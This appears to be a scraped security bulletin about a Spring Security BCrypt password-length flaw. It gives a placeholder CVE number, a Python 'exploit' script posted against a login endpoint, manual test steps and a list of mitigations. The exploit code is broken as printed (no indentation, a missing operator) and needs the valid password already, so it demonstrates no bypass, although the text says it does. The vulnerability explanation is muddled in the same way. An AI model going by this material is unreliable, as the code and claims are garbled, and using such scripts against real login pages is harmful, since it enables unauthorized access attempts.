Spring Security, Password Length Enforcement Vulnerability, CVE-2025-XXXX (High Severity)

By /

How the CVE Works:

The vulnerability lies in the `BCryptPasswordEncoder.matches(CharSequence, String)` method in Spring Security. When validating passwords, this method incorrectly returns `true` for passwords longer than 72 characters if the first 72 characters match the stored hash. This occurs because BCrypt, by design, truncates passwords to 72 characters during hashing. However, the `matches` method fails to enforce this truncation consistently during validation, allowing attackers to bypass password checks by appending arbitrary characters to a valid password. This flaw can lead to unauthorized access to systems relying on Spring Security for authentication.

DailyCVE Form:

Platform: Spring Security
Version: 5.7.0 – 6.4.3
Vulnerability: Password Length Bypass
Severity: High
Date: Mar 20, 2025

What Undercode Say:

Exploitation:

1. Exploit Code:

import requests
target_url = "http://example.com/login"
valid_password = "correct_password"
payload = {"username": "admin", "password": valid_password + "A" 100}
response = requests.post(target_url, data=payload)
if "Login Successful" in response.text:
print("Exploit Successful!")

2. Manual Testing:

  • Use a valid password and append extra characters (e.g., valid_password + "A" 100).
  • Submit the payload to the login endpoint.
  • Observe if authentication succeeds despite the extra characters.

Protection:

1. Upgrade Spring Security:

  • Update to patched versions: 5.7.16, 5.8.18, 6.0.16, 6.1.14, 6.2.10, 6.3.8, or 6.4.4.

2. Custom Password Validation:

public class CustomPasswordEncoder implements PasswordEncoder {
private final BCryptPasswordEncoder encoder = new BCryptPasswordEncoder();
@Override
public String encode(CharSequence rawPassword) {
if (rawPassword.length() > 72) {
throw new IllegalArgumentException("Password must be 72 characters or less.");
}
return encoder.encode(rawPassword);
}
@Override
public boolean matches(CharSequence rawPassword, String encodedPassword) {
if (rawPassword.length() > 72) {
return false;
}
return encoder.matches(rawPassword, encodedPassword);
}
}

3. Input Validation:

  • Enforce password length limits on the client and server sides.

4. Monitoring:

  • Log and monitor failed login attempts to detect exploitation attempts.

5. Patch Management:

  • Regularly review and apply security updates for dependencies.

6. Security Testing:

  • Use tools like OWASP ZAP or Burp Suite to test for password validation flaws.

7. Code Review:

  • Audit authentication logic to ensure proper handling of password length.

8. Configuration:

  • Ensure `BCryptPasswordEncoder` is configured correctly in your Spring Security setup.

9. Education:

  • Train developers on secure coding practices and common vulnerabilities.

10. Incident Response:

  • Develop a response plan for potential breaches resulting from this vulnerability.
    By following these steps, organizations can mitigate the risk posed by this vulnerability and ensure robust password validation in their systems.

References:

Reported By: https://github.com/advisories/GHSA-mg83-c7gq-rv5c
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top